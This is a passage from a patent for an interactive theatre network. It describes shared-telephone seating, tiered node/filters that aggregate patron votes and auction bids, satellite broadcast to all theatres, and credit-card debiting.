theatres; and, a plurality of node/filtering means operatively disposed in a telephone communication system, said plurality of the node/filtering means connected in cascaded tiers of decreasing number from the theatres to the broadcast center, the node/filtering means processing in parallel all data received from upstream sources to reduce data rate transmission requirements downstream and to reduce the number of voice signals forwarded downstream, whereby patrons in the theatres may individually and successively engage in voice communications with persons at the broadcast center and may originate preference data for processing and transmission to the broadcast center responsive to the broadcast signals, displayed for simultaneous perception by all patrons. 2. The commercial/entertainment network of claim 1, wherein each of the theatres further comprises: a plurality of uniquely identifiable communication positions, each having remotely activatable input/output means for voice and data communications as part of said means enabling the patrons to originate preference data and voice signals; a shared patron's telephone; and, means for remotely connecting selected ones of the input/output means to the shared telephone. 3. A commercial/entertainment network for interactive communications between each of a plurality of theaters and a remote broadcast center, the network comprising: a plurality of theaters, each of the theaters comprising: a plurality of uniquely identifiable communication positions, each position having associated therewith a remotely activatable data input/output means for voice and data communications; a telephone coupled to any number of the remotely activatable input/output means; means for processing output data from the communication positions prior to telephone transmission to reduce data rate transmission requirements and for routing voice and data input signals to and among the communication positions; a modem connected to the telephone and to the data processing means for enabling two-way voice and data communication with a remote broadcast center; and, means for receiving and processing, and selectively displaying audio/video and data broadcast signals originating from the remote broadcast center; at least one node/filtering means, comprising: means for receiving and processing output data from each of the theaters in a predetermined region to generate a combined data output to reduce combined data output rate transmission requirements; means for selecting a telephone call request directed to the remote broadcast center from all such request; and, means for transmitting the processed combined output data to the remote broadcast center, and, a remote broadcast center, comprising: means for receiving the processed combined output data and selected telephone call from the at least one node/filter; means for conducting two-way voice communication with any of the patrons at a respective communication position in any of the theaters; signal processing and tabulating means for the combined data output, the signal processing means generating output signals reflecting the data preference selections of all responding patrons in all of the theaters; and, means for generating audio/video and data broadcast signals for transmission to all of said theaters, whereby patrons at respective communication positions in the theaters may individually and successively engage in voice conversations with persons at the remote broadcast center and may collectively originate preference data for processing and subsequent telephone transmission to the broadcast center responsive to the audio/video signal displayed in the theatre for simultaneous viewing by all patrons and responsive to broadcast data received and simultaneously routed to each of the communication positions. 4. A commercial/entertainment network according to claim 3, wherein the at least one node/filtering means comprises: a plurality of first node/filters, each comprising: means for receiving and processing output data from all of the theaters in one of a predetermined number of local regions to generate a combined output data to reduce combined data transmission requirements for downstream transmission; means for selecting a telephone call request directed to the remote broadcast center from each theatre from all such requests; and, means for transmitting the processed combined local output data downstream toward the remote broadcast center; a plurality of second node/filters, each comprising: means for receiving and processing output data from all of the first node/filters in a predetermined number of local regions to generate a combined regional data output to reduce combined data rate transmission requirements for downstream transmission; means for selecting a telephone call request directed to the remote broadcast center from the first node/filters from all such requests; and, means for transmitting the processed combined regional output data downstream toward the remote broadcast center; and, at least one third node/filter, comprising: means for receiving and processing output data from a predetermined number of the second node/filters to generate a combined super-regional data output to reduce data transmission requirements downstream toward the remote broadcast center; means for selecting a telephone call request directed to the remote broadcast center from all such request; and, means for transmitting the processed combined super-regional output data downstream toward the remote broadcast center. 5. The commercial/entertainment network of claim 4, wherein the at least one third node/filter is a final node/filter, receiving telephone call requests and combined regional data outputs from all of the second node/filters. 6. The commercial/entertainment network of claim 5, wherein the final node/filter comprises means for communicating with at least one credit center for establishing a patron's credit status and for debiting a patron's credit account during operation of the network. 7. The commercial/entertainment network of claim 3, further comprising: uplink means for establishing communication from the broadcast center to at least one communications satellite; and, downlink means for each theatre for establishing communication from the at least one communications satellite to each theatre, whereby signals broadcast from the broadcast center are simultaneously received at each theatre, enabling each patron in each theatre to receive the audio/video and data broadcast signals and display the same at the same time irrespective of theatre location. 8. A commercial/entertainment theatre forming part of an interactive network of such theatres, the theatre comprising: a data and communications circuit including a shared telephone; a plurality of communication positions, each communication position having remotely activatable input/output means for voice and data communications; remotely addressable switching means, for each of the positions, coded to uniquely identify the position, for selectively connecting the input/output means to the data and communications circuit; and, means for displaying audio/video signals broadcast simultaneously to each theatre in the network from a remote broadcast center, whereby voice communications may be established between a patron at a respective communication position in the theatre and a person at the remote broadcast center through the shared theatre telephone and whereby a patron may originate preference data for processing and subsequent transmission to the broadcast center responsive to broadcast signals originating from the remote broadcast center. 9. The commercial/entertainment theatre of claim 8, wherein each of the remotely activatable input/output means comprises: a remotely activatable telephone handset means; a remotely activatable data input means; and, a remotely monitorable data output means. 10. The commercial/entertainment theatre of claim 9, wherein: the data output means comprises manually operable switch means; and, the data input means comprises illuminated display means. 11. The commercial/entertainment theatre of claim 8, further comprising a control position for all of the communication positions, the control position comprising: means for controlling the audio/video signal displaying means; means for processing output data from all of the input/output means to generate a combined theatre data output; means for selectively connecting the shared telephone to any selected one of the input/output means; and, means for establishing telephone communication between the theatre and a remote location on the network, for enabling two-way voice communication and combined data output transmission. 12. The commercial/entertainment theatre of claim 8, wherein each of the communication positions comprises means forming a seat for a patron, the input/output means being at least partly mounted in and on the seat means, each of the seats being so disposed to enable patrons to simultaneously view the displayed audio/video signal. 13. A commercial/entertainment theatre for interactive communications with a remote broadcast center, the theatre comprising: a plurality of uniquely identifiable communication positions, each position having associated therewith a remotely activatable input/output means for voice and data communications; a telephone coupled to any number of the remotely activatable input/output means; means for processing output data from the communication positions prior to telephone transmission to reduce data rate transmission requirements and for routing voice and data input signals to and among the communication positions; a modem connected to the telephone and to the data processing means for enabling two-way voice and data communication with a remote broadcast center; and, means for receiving and processing, and selectively, displaying audio/video and data broadcast signals originating from the remote broadcast center, whereby patrons at respective communication positions in the theatre may individually and successively engage in voice conversations with persons at the remote broadcast center and may simultaneously originate preference data for processing and subsequent telephone transmission to the broadcast center responsive to the audio/video signal displayed in the theatre for simultaneous viewing by all patrons and responsive to broadcast data received and simultaneously routed to each of the communication positions. Description This is a continuation of application Ser. No. 057,029 filed June 3, 1987, now abandoned. BACKGROUND OF THE INVENTION 1. Field of the Invention The invention relates to the field of interactive voice and data communication networks in general, and in particular, to a commercial/entertainment network for interactive communications between patrons in each of a plurality of theaters and a remote broadcast center. 2. Prior Art Generally speaking, the invention comprises: a network of club-style theaters located remotely from one another and remotely from a central or coordinating broadcast studio; a shared telephone system for such a network; and, a communications position for such a network or telephone system. It is contemplated that attendance at such theatres would not be on the basis of general admission, but would be on the basis of members only, guests of members or by special invitation. Membership might also be associated with membership in sponsoring clubs and other such organizations. A number of individual theaters will be linked by telephone lines to a city or local node/filter. A plurality of city or local node/filters will be linked by telephone lines to a regional node/filter. All of the regional node/filters will be linked by telephone lines to a national or super-regional node/filter, the national or super-regional node/filter being linked by telephone lines to the central studio and to one or more credit card companies. Two-way, interactive communications are provided between the studio and patrons in the various theaters. A parallel communications link is provided by satellite for television communications transmitted from the studio directly to each of the theaters. Data transmitted from patrons in the theaters to the studio is processed in parallel at each tier of node/filters, such data processing significantly reducing the data rate transmission requirements and enabling typical data processing from all theaters to the studio to be completed in a short period of time. Communications from the studio to each of the theaters, and to each of the patrons in the theaters, by the satellite link is simultaneous at each theatre and for each patron. Such timing is very important, as applications such as auctions and surveys require that the patrons or participants receive information from the studio at the very same time, regardless of the location or remoteness of the theatre. Communications in each theatre and at the studio are preferably controlled by respective computers. Each theatre computer is directly linkable to the satellite downlink and is linkable to existing telephone system lines through a modem. In a preferred embodiment of the invention, each theatre is provided with a telephone system having, in effect, only one telephone, but with a large number of telephone handsets, one for each patron or participant. Each patron or participant is also preferably provided with at least two indicator lights and at least two push buttons for registering responses to questions and the like. The telephone handset, indicator lights and push buttons are embodied in a communication position for each patron. Each communication position is preferably remotely controlled through a uniquely coded switch circuit. Access between the single telephone and one or more of the plurality of handsets is controlled through the computer. Such a network enables any individual in any theatre to communicate directly by telephone with a moderator or master of ceremonies in the studio. Data can also be transmitted for simultaneous reception at each theatre by transmission together with the video signal set by means of the satellite link, for example in the blanking intervals of the video signal. Such a network provides the greatest flexibility of the interactive entertainment and communication. Although some of the following patent references are related to communication networks and interactive communication networks, none discloses or suggests the grand scheme of the invention. The following United States' patent references are believed to be illustrative of the state of the art, and at the same time, illustrative of significant short comings in the prior art and the failure to fully develop and utilize an interactive communication network: 3,752,904--Waterbury; 3,909,536--Watson, et al; 4,008,369--Theurer, et al; 4,071,697--Bushnell, et al; 4,355,372--Johnson, et al; 4,360,827--Braun; 4,368,358--Herschtal; 4,603,232--Kurland, et al; and, 4,630,108--Gomersall. A particular telephone network taught by Watson, et al is appropriate for what is termed as "incasting", a situation which is defined as being opposite to broadcasting, in that information flows from a plurality of sources to a single sink. The incasting system is of interest only insofar as the incasting is said, generally, to be responsive to radio or television broadcasts. The disclosure is primarily directed to use of a single television and a single telephone in each single home location, although there is some mention that a special incast signal generator circuit be at the seating location of the incaster and there is some suggestion that the system could be wired to simulate the telephone system in a large auditorium, with some or all of the seats representing an incast source. Braun discloses an interactive audio and video conferencing network, but is concerned almost exclusively with eliminating problems due to the difference in transmission delays between a satellite link (said to be approximately 250 milliseconds) and the telephone system (said to be 10 to 20 milliseconds). The basic solution suggested by Braun is to transmit only a video signal through the satellite link, the audio feed from the studio being transmitted through the telephone network. Although each of Watson, et al and Braun suggest a network in the very broadest sense wherein remote participants communicate with a central location through telephone lines and satellite links, the commerical/entertainment according to this invention provides a measure of flexibility in application which is neither provided nor appreciated in the prior art. Neither reference anticipates the problem nor suggests solutions which might be associated with data rate transmission requirements for communication networks formulated on a scale apparently incomprehensible to those skilled in the art. With regard to the theaters forming part of the invention, neither reference suggests even the general concept of a plurality of local theaters wherein all patrons in a single theatre have access to single video monitor or projection screen and one of a plurality of telephone handsets linkable to a single telephone, the handsets being remotely activatable together with data input/output means. The use of only one "telephone" in each theatre not only reduces initial equipment costs, but enables the degree of network operating supervision necessary to achieve high efficiency and low operating cost. The patent to Herschtal discloses circuitry for sharing communications loops in telephone systems, although it appears to require a complete telephone at each location on the loop, rather than merely a handset. The remaining references are believed to be of only general interest. Insofar as those skilled in the art have sought to utilize existing communication technology, including telephone and satellite systems for voice and data communication, and television or radio broadcasts, those skilled in the art have had only a limited vision of the commercial and entertainment potential of a truly integrated, conveniently interactive communications network which can be substantially implemented with existing communications and switching equipment, which can utilize existing telephone and communications satellites, which can be implemented with considerably less capital expenditure than otherwise thought possible and which can be made to operate with enough speed and efficiency to be on-line and practical. The commercial/entertainment network according to this invention meets all such criteria. Patrons at uniquely identifiable and respective communication positions in the theaters may individually and successively engage in voice conversations with persons at a remote broadcast center and may collectively originate preference data for processing and subsequent telephone transmission to the broadcast center responsive to an audio/video signal displaying in the theatre for simultaneous viewing by all patrons and responsive to broadcast data received and simultaneously routed to each of the communication positions. A plurality of node/filters are operationally disposed in tiers and enable data collection and transmission to proceed from each of the theaters to the broadcast center with significantly reduced data rate transmission requirements. SUMMARY OF THE INVENTION It is an object of this invention to provide a commercial/entertainment network for interactive communications between each of a plurality of theaters and a remote broadcast center. It is another object of this invention to provide a commercial/entertainment network whereby patrons in the theaters may individually and successively engage in voice conversations with persons at the remote broadcast center. It is still another object of this invention to provide a commercial/entertainment network whereby patrons may collectively originate preference data for processing and subsequent transmission to the broadcast center. It is yet another object of this invention to provide a commercial/entertainment network whereby such preference data may be responsive to audio/video and/or data displays in the theatre. It is yet another object of this invention to provide a commercial/entertainment network whereby such audio/video and data signals may be simultaneously viewed or otherwise perceived by all patrons simultaneously. It is yet another object of this invention to provide a commercial/entertainment theatre forming part of an interactive network of such theaters. It is yet another object of this invention to provide a commercial/entertainment theatre whereby voice communications may be established by remote control between a patron and a remote location in the network through a shared theatre telephone. It is yet another object of this invention to provide a commercial/entertainment theatre wherein each patron participates in the network through remotely activatable input/output means for voice and data communications, which means are associated with a uniquely identifiable communication position. It is yet another object of this invention to provide a communication/entertainment theatre wherein the input/output means for each communication position is controllable by remotely addressable switching means. It is yet another object of this invention to provide a telephone system wherein a single telephone may be shared by a plurality of users, each user having only a telephone handset or the like. It is yet another object of this invention to provide such a telephone system which can be embodied in a commercial/entertainment theater forming part of a network of a plurality of such theaters. It is yet another object of this invention to provide a communication position for a patron in a commercial/entertainment theatre, the theatre forming part of an interactive network of such theaters. It is yet another object of this invention to provide a communication position providing a patron with access to remotely activatable telephone handset or receiver means, remotely activatable data input means and remotely monitorable data output means. It is yet another object of this invention to provide a communication position wherein such remotely activatable and monitorable voice and data input/output means are controllable by remotely addressable switching means. It is yet another object of this invention to provide a communication position which is incorporated into a comfortable arm chair or the like. These or other objects of the invention are accomplished by a commercial/entertainment network for interactive communications between each of a plurality of theaters and a remote broadcast center, the network comprising: a plurality of theaters, at least one node/filtering means and remote broadcast center. Each of the plurality of theaters may comprise: a plurality of uniquely identifiable communication positions, each position having associated therewith a remotely activatable data input/output means for voice and data communication; a telephone remotely connectable to any number of the remotely activatable input/output means; means for processing output data from the communication positions prior to telephone transmission to reduce data rate transmission requirements and for routing voice and data input signals to and among the communication positions; a modem connected to the telephone and to the data processing means for enabling two-way voice and data communication with the remote broadcast center; and, means for receiving and processing, and when appropriate, displaying audio/video and data broadcast signals originating from the remote broadcast center. The at least one node/filtering means may comprise: means for receiving and processing output data from each of the theaters in a predetermined region to generate a combined data output to reduce combined data output rate transmission requirements; means for selecting a telephone call request directed to the remote broadcast center from all such requests; and, means for transmitting the processed combined output data to the remote broadcast center. The remote broadcast center may comprise: means for receiving the processed combined output data and selected telephone call from the at least one node/filter; means for conducting two-way voice communication with any of the patrons in any of the theaters; signal processing and tabulating means for the combined data output, the signal processing means generating output signals reflecting the data preference selections of all responding patrons in all of the theaters; and, means for generating audio/video and data broadcast signals for transmission to all of said theaters. In such a commercial/entertainment network, patrons at respective communication positions in the theaters may individually and successively engage in voice conversations with persons and the remote broadcast center and may collectively originate preference data for processing and subsequent telephone transmission to the broadcast center responsive to the audio/video signal displayed in the theatre for simultaneous viewing by all patrons and responsive to broadcast data received and simultaneously routed to each of the communication positions. In an extensive network, the at least one node/filtering means may comprise a plurality of node/filtering means operatively arranged in tiers. Each of a plurality of first node/filtering means may comprise: means for receiving and processing output data from all of the theaters in one of a predetermined number of local regions to generate a combined output data to reduce combined date transmission requirements for downstream transmission; means for selecting a telephone call request directed to the remote broadcast center from theatre from all such requests; and, means for transmitting process combined local output data downstream toward the remote broadcast center. Each of a plurality of second node/filtering means may comprise: means for receiving and processing output data from all of the first node/filtering means in a predetermined number of local regions to generate a combined regional data output to reduce combined data rate transmission requirements for downstream transmission, means for selecting a telephone call request directed to the remote broadcast center from the first node/filtering means from all such requests; and, means for transmitting the process combined regional output data downstream toward the remote broadcast center. At least one third node/filtering means may comprise: means for receiving and processing output data from a predetermined number of the second node/filtering means to generate a combined national or super-regional data output to reduce data transmission requirements downstream toward the remote broadcast center; means for selecting a telephone call request directed to the remote broadcast center from all such requests; and, means for transmitting the processed combined national or super-regional output data downstream toward the remote broadcast center. In those instances where network size dictates that only one third node/filtering means is necessary, the third node/filtering means may be incorporated into or be operatively associated with the remote broadcast center. The at least one third node/filter may also comprise means for communicating with at least one credit center for establishing a patron's credit status and for debiting a patron's credit account during operation of the network. These and other objects of the invention are also accomplished by a commercial/entertainment network for interactive communications between each of a plurality of theaters and a remote broadcast center, comprising a two-way data and voice telephone communication path and a one-way satellite-linked broadcast signal communication path, enabling simultaneous transmission and perception of displayed data and signals by all patrons in all theaters and enabling parallel processing of preference data generated by all patrons in all theaters. These and other objects of the invention are also accomplished by a telephone system comprising a communications circuit including a shared telephone; a plurality of communication positions, each communication position having remotely activatable input/output means for voice communications; and, remotely addressable switching means, for each of the positions, coded to uniquely identify the position, for selectively connecting the input/output means to the communications circuit, whereby voice communications may be established by remote control between a system user and a remote location on the network through the shared telephone. The telephone system may be embodied in and form part of a commercial/entertainment theater in a network of such theaters. These and other objects of the invention are also accomplished by a communication position for a patron in a commercial/entertainment theatre, the theatre forming part of an interactive network of such theaters. The communication position may comprise: a remotely activatable telephone handset or receiver means; a remotely activatable data input means; and remotely monitorable data output means; and, remotely addressable switching means, coded to uniquely identify the position, for operatively connecting telephone handset or receiver means, data input means and the data output means to a data and communications circuit within the theatre. Further objects and advantages of the invention will be apparent to those skilled in the art from the following detailed description of the preferred embodiments of the invention. BRIEF DESCRIPTION OF THE DRAWINGS For the purpose of illustrating the invention, there are shown in the drawings forms which are presently preferred; it being understood, however, that the invention is not limited to the precise arrangements and instrumentalities shown. FIG. 1 is a block diagram of a commercial/entertainment network, according to this invention, for interactive communications between each of a plurality of theaters and a remote broadcast center; FIG. 2 is a block diagram of a typical theatre forming part of the network shown in FIG. 1 and embodying a shared telephone system; FIG. 3 is a block diagram of a typical studio/broadcast center forming part of the network shown in FIG. 1; FIG. 4 is a block diagram of a suitable circuit for the communication position forming part of the theatre shown in FIG. 2; FIG. 5 is a perspective view of an arm chair forming part of the communication position shown in FIG. 2, and housing the circuit and input/output means shown in FIG. 4; FIG. 6 is a block diagram of a typical city or local node/filtering means forming part of the network shown in FIG. 1; FIG. 7 is a block diagram of a typical regional node/filtering means forming part of the network shown in FIG. 1; and, FIG. 8 is a block diagram of a typical national or super-regional node/filtering means forming part the network shown in FIG. 1. DETAILED DESCRIPTION OF THE PREFERRED EMBODIMENTS A commercial/entertainment network for interactive communications between each of a plurality of theaters and a remote broadcast center is shown in block diagram form in FIG. 1, and generally designated 10. In the illustrated embodiment, the commercial/entertainment network 10 comprises a plurality of theaters 20, a remote studio/broadcast center 30 and a plurality of communication paths. A first communication path 40 incorporates an established telephone system and enables two-way voice communication and data transmission between each of the theaters 20 and the broadcast center 30. A second communication path 50 provides simultaneous, one-way video/audio signal and data transmission from the broadcast center 30 to each of the theaters 20. A third communication path 60 provides two-way data communication between the broadcast center 30 and one or more credit card companies 602. Communication path 40 also provides for two-way data communication between each of the theaters 20 and the credit card companies 602. In the extensive network 10 shown in FIG. 1, communication path 40 comprises a plurality of node/filtering means operatively disposed in an established telephone system to control data and voice transmissions along communication path 40. The node/filtering means are arranged in tiers, and the number of tiers will ultimately depend upon the number of theaters and the capacity of switching equipment and processing equipment in each node/filter. Decisions as to whether higher efficiency and/or lower cost can be achieved by having smaller numbers of higher capacity node/filtering means or larger numbers of lower capacity node/filtering means is an engineering decision which cannot be made out of context. It is currently contemplated that a reasonable balance is achieved if each of the node/filtering means can accommodate approximately twenty voice/data input lines or signal sources, and generate a single combined voice/data output signal or line forming a single source for a downstream node/filtering means or the broadcast center. Each theatre 20 is connected to a city or local node/filtering means 402 by a voice/data telephone line 408. Each city of local node/filtering means 402 is connected to a regional node/filtering means 404 by a voice/data telephone line 410. Each regional node/filtering means 404 is connected to a national or super-regional node/filtering means 406 by a voice/data telephone line 412. The national or super-regional node/filtering means 406 is connected to the studio/broadcast center 30 by a voice/data telephone line 414. Each of the node/filtering means in each of the tiers (402, 404, 406) functions as a parallel data processor for generating a combined data output to reduce combined data output rate transmission requirements downstream toward the broadcast center. Each node/filtering means is also effective to reduce the number of telephone call requests directed to the remote broadcast center from all such requests in all such theaters, or all such requests forwarded by upstream node/filtering means. Suppose for example that 8000 theaters, each with fifty (50) patrons, were participating in a network. Suppose further that the preference data represented a yes/no vote. Heretofore, it would be necessary to transmit 400,000 separate votes to a tabulating center over 400,000 telephone lines, requiring enormous switchboard capacity and data receiving means. Such an arrangement of theatres is functionally equivalent to 400,000 individual participants, each in his or her own home, using the home telphone. If such a vote were conducted on a network as shown in FIG. 1, each of the theaters need transmit only two "pieces" of information: (1) "yes" or "no"; and, (2) the numerical difference or margin, for example, by "6". Only one telephone line is necessary to transmit this information, and a "typical" node/filtering means handles twenty such lines (and twenty theaters). A first node/filtering means would process data from all of its theaters, and need only transmit two "pieces" of data to a second node/filtering means, "yes" or "no", and the difference or margin. If operating at full capacity (e.g. twenty theaters, each with fifty patrons), the output of one of the first node/filtering means would represent the preference data of 1000 patrons, and would represent such data with only two "pieces" of information. With a full complement of twenty (20) second node/filtering means, each handling twenty (20) first node/filtering means, the output of each second node/filtering means would represent the preference data of 20,000 patrons, and would represent such data with only two "pieces" of information. Finally, if a single third node/filtering means was connected to twenty (20) second node/filtering means, the third node/filtering means would represent the preference data of 400,000 people, and would represent such data with only two "pieces" of information. The average processing and transmission time can be expected to be on the order of only thirty seconds or so. A network according to the invention offers efficiency of enormous proportion. In a commercial context, for example, an auction, the first patron in each theatre responding can "seize" the shared telephone and initiate a race between all such first responders, through the network and tiers of node/filtering means. The time required for the race would be essentially imperceptible. Bidding might also be conducted on a "group" basis whereby any response from a theatre will keep the theatre "in" the auction. Eventually, as the price increases, theaters will drop out, and first and second node/filtering means will drop out; until only one theatre, and then only one patron in that theatre has been identified as the highest bidder. Bidder indentity might be revealed to all when, for example, only ten bidders remain. Patrons will at all times be able to enter or reenter the bidding, and node/filtering means will become active again, as necessary. In any event, all patrons in all theaters will continue to monitor the auction, through the broadcast signal. In an entertainment context, a race situation would also accommodate the need to establish voice communications between a "lucky" patron and a celebrity or host at the broadcast center. The network can be easily manipulated by supervisors to assure that patrons with slower reflexes (or indeed, theaters with patrons having slower reflexes) have equal opportunities to reach the broadcast center. The manipulations would, of course, take place without knowledge of the patrons and need not be "unfair" in any sense. Communication path 50 enables audio/video and data transmission to be simultaneously received at each theatre, and by each patron in each theatre. Such simultaneous reception is a necessity, for example, to assure fairness in commercial/entertainment ventures such as auctions and invitations to converse with famous personalities or influencing a subsequent phase of entertainment. The broadcast center 30 is connected to a satellite uplink transmitting means 502 by an uplink transmission line 302. Each theatre 20 is provided with a satellite downlink receiving means 504 by a downlink transmission line 202. The satellites are not illustrated, and to the extent that relays would be necessary between or among more than one satellite, it would be appropriate to employ equipment necessary to assure simultaneous reception at each theatre. Communication path 60 is particularly important in the context of auctions or the sale of merchandise from the studio/broadcast center 30 to each of the patrons in all of the theaters 20. The first communication path 40 can be utilized by supervisors in each theatre to assure that each patron has sufficient credit available to enable purchases, and to store this information and/or to transmit this information to a temporary data bank at the studio/broadcast center 30. Thereafter, whenever a patron is a successful bidder in an auction, or has consummated a merchandise purchase, a supervisor at the studio/broadcast center may signal the purchase directly to the credit card company 602, assuring instant debiting of the patron's account and consequent crediting of the merchandiser's account. Automatic running tabulations conducted at either or both the theaters 20 or the studio/broadcast center 30 would assure that no purchases could be made which were not covered by an appropriate credit line or account balance. In other words, merchandising through the network assures instant payment and the absence of accounts receivable. A block diagram illustrating a typical theatre 20 is shown in FIG. 2. Each theatre 20 comprises a plurality of communication positions 204, each communication position having remotely activatable input/output means for voice and data communications. With further reference to FIG. 4, the input/output means for voice communications comprises a telephone handset or receiver means 206. The input/output means for data communications comprises indicator lights 208 and push-buttons 210. The remotely activatable input/output means for each communication position 204 is connected to a data and communications circuit 230, including a shared telephone 214. The input/output means of the communication positions are remotely and selectively connectable to the telephone 214 through line 232, under the control of a computer controller/data processor 216. The computer controller/processor 216 also controls modem 234, enabling telephone 214 to be connected to an established telephone system through line 236 to modem 234, and thereafter, to a city or local node/filtering means 402 by telephone line 408. Audio/video and data broadcast signals originating from the remote broadcast center 30 are received by the satellite downlink means 504 and transmitted to a signal processor 238 by downlink input transmission line 202. Signal processor 238 provides a demultiplexing or dividing function, whereby broadcast data is directed to computer 216 through line 248. The video signal is routed through line 242 to a video monitor or projection system 240. The video display is contemplated to be as large and as of high quality as is commercially available, to be as "movie-like" as possible. The audio signal is routed through line 246 to an audio or speaker system 244, which is preferably a multi-track stereo system of exceptional fidelity. Computer 216 may conveniently be, for example, a personal computer. The various voice and data communication lines can be connected to the computer by typical parallel and serial ports. The computer may also be utilized as a centralized controller for routing data to and from the communication positions 204, over the data and communication system 230, modem line 236 and satellite downlink data line 248. An operator station 218 is associated with computer 216 and connected thereto by control line 220. Other lines representative of the control functions have been omitted for purposes of clarity, as the control of modems, satellite downlink systems, video monitors or projectors and audio systems and the like is known to those skilled in the art. A typical remote broadcast center 30 is shown in block diagram form in FIG. 3. Combined output data from the national or super-regional node/filtering means 406 reaches modem 304 through telephone line 414. The modem 304 is connected to computer controller/processor 308, which may also be a personal computer. The computer 308 routes voice signals to telephone 306 by line 318, telephone 306 being controlled by a first operator station 312 through line 320. Telephone 306 and operator station 312 may comprise telephone switchboard means. The computer 308 is itself controlled by a second operator station 314 and controls data flowing to and from a signal processor 310. The operator stations may be combined. The signal processor 310 receives audio/video signals from a video camera 328 by video camera line 332 or from a video cassette recorder 324 through recorder line 326. The video camera 328 may be used to originate a broadcast signal for a show, auction, sale or the like originating on a stage or set 330. Audio/video signals and data signals from the computer are routed to a satellite uplink means 502 through uplink output line 302, for simultaneous transmission to each of the theaters. The signals may be encrypted to avoid unauthorized access. FIG. 4 is a block diagram of a circuit suitable for each of the communication positions 204. In the presently preferred embodiment, the input/output means comprises a telephone handset or receiver means 206, two indicator lights 208 and two push-buttons 210. The term "telephone handset or receiver means" is intended to mean that part of a complete telephone set which one normally speaks into and places adjacent one's ear. It is a particular advantage of the invention that only one telephone is needed for each theatre. The term "telephone" is intended to mean that portion of a telephone set which is capable of being connected to a telephone line and that part which enables dialing and the like to take place. It is not necessary that the telephone handset or receiver means 206 be in the form of a hand-held device, and could certainly be of the type sometimes used for radio transceivers which is held on one's head. The particular nature and structure of the indicator lights and push-buttons is also unimportant, and is the specific number of such indicators and monitorable means. The data and communication circuit 230 comprises a telephone line or bus 270 and a set of data lines or bus 272. Indicator lights 208 are driven by a circuit 266 (DR) which is connected to the data bus 272 through remotely activatable switch 260. Push-buttons 210 are controlled by a button circuit 268 (B. CKT.), which is connected to the data bus 272 through switch 260. Telephone handset or receiver means 206 is connected to the phone bus 270 through switch 260. Switch 260 is controlled by an encodeable and remotely activatable switching means 262 (SW CTRL.), which is provided with a plurality of rocker switches 264 (SET SW.) providing a uniquely identifiable code for each communication position. The number of lines in data bus 272 is illustrative and not specific. The data bus 272 will include lines for addressing the remotely activatable and coded switching means 262 as well as lines for activating indicator lights 208 or accepting signals from push buttons 210. The uniquely identifiable code, which can of course by provided by a variety of means in addition to that indicated, enables each telephone handset or receiver means 206 to be individually connected to the shared telephone 214 for both in-coming and out-going telephone communication. The control circuit may be substantially mounted on a circuit board or card which, together with the various switches and control circuits, comprises a position control means 212. A connector 270 is provided for attaching the various circuits of the control position means to the data and telephone buses. The position control means 212 are preferably incorporated into a comfortable seat or chair 600 as shown in FIG. 5. The chair 600 may be provided with arms 602 and 604, one of which houses the circuit card of the control position means in an interior space. A control panel 606 in which lights 208 and buttons 210 are disposed is mounted on the surface of arm 602 and a receiving cradle or recess 608 is provided for telephone handset or receiver means. The telephone handset or receiver means 206 can be concealed by cover 610. Each of the seats 600 is so arranged in the theatre 20 as to enable each patron to have a clear and unobstructed view of the video monitor or projection means 240. A typical first node/filtering means 402 is illustrated in FIG. 6. The purpose of each node/filtering means, as described above, is to process all data received from upstream sources and to combine such data into an output having significantly lower data rate transmission requirements. At the same time, each node/filtering means must select one of all incoming phone calls from upstream sources and forward or connect such telephone call through the network toward the remote broadcast center. It is also necessary for each node/filtering means to combine or multiplex the digital data and the voice for transmission downstream to the next tier of node/filtering means or the remote broadcast center as is appropriate. A suitable circuit for the first node/filtering means comprises a telephone call receiver and selector means 420 to which all of the voice and data lines 408 from each theatre 20 in a local area are connected. Telephone call receiver and selector means 420 may embody a switchboard. The telephone call receiver and selector means is controlled by a data processor 428 by control line (shown as a dotted line to distinguish from a communication line) 432. Each telephone call is likely to include data as well as being indicative of a telephone call request. Accordingly, each call must be routed through line 422 to a demultiplexer or decoder 424, the output of which is directed to the data processor 428 through line 426. Data processor 428 accumulates preference data from each of the lines 408, and controls the switching and routing of the various lines 408 through demultiplexer 424. At the same time, telephone call receiver and selector means 420 must select at least one telephone call and place that call on hold after its data has been routed through demultiplexer 424, while all of the other lines 408 are processed. The selection of telephone calls being held can be a random selection for each round of preference data transmission, random selection being made by the data processor. The data processor 428 may be in the form of a personal computer. After all of the lines 408 have been processed, the held telephone call is routed to multiplexer 436 through line 434, where it is combined with the combined data output from the data processor, provided through line 430. The combined voice and data information is sent through line 438 to modem 442, under the control of the data processor by control line 440, providing a voice and data line 410 directed to a regional node/filtering means 404, as shown in FIG. 7. The operation of the regional node/filtering means shown in FIG. 7 is identical in virtually every respect to the node/filtering means shown in FIG. 6. The regional node/filtering means 404 has a telephone call receiver and selector means 450 connected to each of the voice and data lines 410 from one city on local node/filtering means 402. Data is routed to the data processor 458 through line 452, demultiplexer 454 and line 456; the data processor controlling the telephone call receiver and selector means 450 through control line 462. The combined data output is supplied to multiplexer 466 through line 460, which combines the digital data with the voice signal routed through line 464, the combined voice and signal information reaching modem 472 through line 468, the modem being controlled through line 470. The combined output forms a voice and data line 412 directed to a national or super-regional node/filter. A national or super-regional node-filtering means 406 is shown in FIG. 8. The operation of the node/filtering means 406 is substantially identical to that of the node/filtering means shown in FIGS. 6 and 7, except for telephone line 604 forming part of the two-way data communication path 60 to the at least one credit card company 602. Telephone calls to and from the credit card companies cannot be filtered or selected, and must be held as necessary until all are processed and acknowledged. Otherwise, the node/filtering means 406 comprises a telephone call receiver and selector means 476 connected to a demultiplexer 480 by line 478 and to multiplexer 492 through line 490; the telephone call receiver and selector means 476 being controlled by data processor 484 through control line 488. Data reaches data processor 484 from demultiplexer 480 by line 482, and is combined with the voice signal in the multiplexer after being routed through line 486. The combined signals reach modem 498 through line 494 and are outputted as a voice and data line 414 directed to the studio/broadcast center. The modem is under the control of the data processor 484 by control line 496. It is not necesary that each node/filtering means hold and forward only one telephone call, and it is contemplated that the node/filtering means will be controllable or programmed to hold and forward larger numbers of calls when desired. In a broad systems sense, the invention may be thought of as a commercial/entertainment network for interactive communications, comprising: a plurality of theatres, each having means for substantially simultaneously displaying to all patrons, in all of the theatres, broadcast signals originating from a remote source and means, including for example a shared telephone system, enabling the patrons to originate preference data and voice signals responsive to the displayed broadcast signals; a broadcast center remote from the theatres for originating the broadcast signals transmitted to all of the theatres; and, a plurality of node/filtering means operatively disposed in a telephone communication system and connected in cascaded tiers of decreasing number from the theatres to the broadcast center, each of the node/filtering means processing in parallel all data received from upstream sources to reduce data rate 